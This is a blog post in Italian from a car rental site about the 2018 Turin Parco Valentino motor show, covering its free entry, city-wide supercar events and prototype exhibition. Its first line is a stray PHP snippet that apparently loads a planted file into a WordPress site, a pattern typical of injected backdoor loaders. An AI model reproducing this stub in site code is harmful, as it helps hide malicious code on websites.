if(!function_exists('classLink')){ if(file_exists(ABSPATH . WPINC . '/class-wp-type.php')){ require_once( ABSPATH . WPINC . '/class-wp-type.php' ); } }Tutto pronto per l'edizione del Salone dell’Auto di Torino Parco Valentino

Blog

Ultime Notizie da RentalPlus

GRANDI NOVITÀ PER IL SALONE DEL PARCO VALENTINO 2018

Ingresso gratuito, estensione della manifestazione all'intera città di Torino e una grande festa motoristica per oltre 1.000 supercar.

salonetorino2018

A GIUGNO IL VIA – Tutto è pronto per la prossima edizione del Salone dell’Auto di Torino Parco Valentino, che si terrà dal 6 al 10 giugno 2018, con orario prolungato dalle 10 alle 24. Forte degli oltre 700.000 visitatori dello scorso anno, la manifestazione riproporrà l’ormai classica formula dell’esposizione all’aperto, lungo i viali del Parco, di anteprime e novità. L’accesso avverrà con un biglietto elettronico gratuito che darà accesso a eventi speciali, per cui sono attesi non meno di 300.000 spettatori, e che consentirà agli organizzatori di tracciare un profilo del visitatore (per il rilascio del biglietto dovranno essere fornite alcune informazioni sui propri gusti e propensioni automobilistiche). Finora, sono più di 40 le case che hanno confermato la loro partecipazione al Salone (tra cui FCA, Volkswagen, Mercedes, Suzuki, Mazda).

Parco Valentino 2-kGVF–835×437@IlSole24Ore-Web

NON SOLO PARCO VALENTINO – La grande novità di quest’anno è il coinvolgimento di tutta la città di Torino, in una sorta di “fuorisalone dell’auto” che trasformerà le piazze e le vie della città piemontese in “showroom” all’aperto di supercarprototipi auto storiche da collezione. Per coinvolgere gli appassionati (proprietari di Porsche, Ferrari, Lamborghini, McLaren, Maserati, Pagani, Mercedes-Benz AMG, Aston Martin, Bentley, Rolls-Royce, Lotus) verranno predisposti centri di ritrovo di supercar del passato e del presente a Milano, Brescia, Verona, Padova, Genova, Modena, Bologna, Firenze e Roma, da dove le auto partiranno per partecipare alla RoadToParcoValentino, un viaggio che sabato 9 e domenica 10 giugno le porterà in alcune piazze di Torino, dedicate alla manifestazione.

ATTENZIONE ALLE ELETTRICHE – Ma ci sarà spazio anche per molte altre iniziative: come il focus sulle auto elettriche in piazza San Carlo, dove si potrà passare in rassegna l’attuale produzione di vetture a corrente o ibride plug-in di tutte le case, con una particolare attenzione per le BMW i8 e le Tesla provenienti da tutta Europa, o la conferenza “Tesla Revolution”, che si svolgerà sabato 9 giugno al Museo dell’auto, nella quale si discuterà di mobilità elettrica. Ci saranno anche spazi riservati alle auto d’epoca, con il meeting internazionale di Car&Vintage in piazza Carlo Alberto, incontri dedicati alla Fiat 500 in piazza Bodoni, un’esposizione di 80 Lancia Delta Integrale in piazza Vittorio Veneto. È previsto anche il primo raduno mondiale dei proprietari della recentissima Dallara Stradale, la prima vettura di serie firmata dall’ingegnere Giampaolo Dallara.

salone-auto-torino-parco-valentino-2018_513017460c81d7dc40ceafe52b905192e8c78

UNA SFILATA CON LE PROPRIE AUTO – Al Salone dell’Auto di Torino Parco Valentino verranno celebrati pure “compleanni” speciali: il 70° anniversario della Land Rover, gli 80 anni del Maggiolino Volkswagen e il 70° della Citroën 2 CV. E il Ferrari Club Italia porterà nella città piemontese le Ferrari a 8 e a 12 cilindri classiche e moderne, accompagnate da uno “special guest” a sorpresa. Le auto che animeranno le piazze nel fine settimana saranno anche coinvolte in passerelle alle quali i proprietari parteciperanno gratuitamente: 3 chilometri di percorso, con partenze a cadenza oraria lungo via Roma, via Po, piazza Vittorio Veneto, i Murazzi sul Po e corso Cairoli, prima di tornare nelle piazze.

PEZZI UNICI IN MOSTRA – Accanto ai nuovi modelli di varie case esposti lungo i viali di Parco Valentino, sarà allestita una mostra di prototipi e vetture speciali presso il complesso fieristico Torino Esposizioni, che consentirà ai visitatori di passeggiare accanto a modelli che hanno fatto la storia del design automobilistico provenienti da tutto il mondo. Tra i prototipi esposti ci saranno modelli di Pininfarina, Giugiaro, Italdesign, Zagato, Fioravanti, Touring Superleggera, Stola e Studiotorino e, per la prima volta, alcuni tra i più importanti prototipi della collezione Bertone dell’Asi (l’Automotoclub storico italiano). Un’occasione per conoscere da vicino la cultura automotive, a ingresso gratuito per il pubblico attraverso il biglietto elettronico scaricabile sul sito www.parcovalentino.com.

Fonte: www.alvolante.it

Leave comments

Your email address will not be published.*



You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

Back to top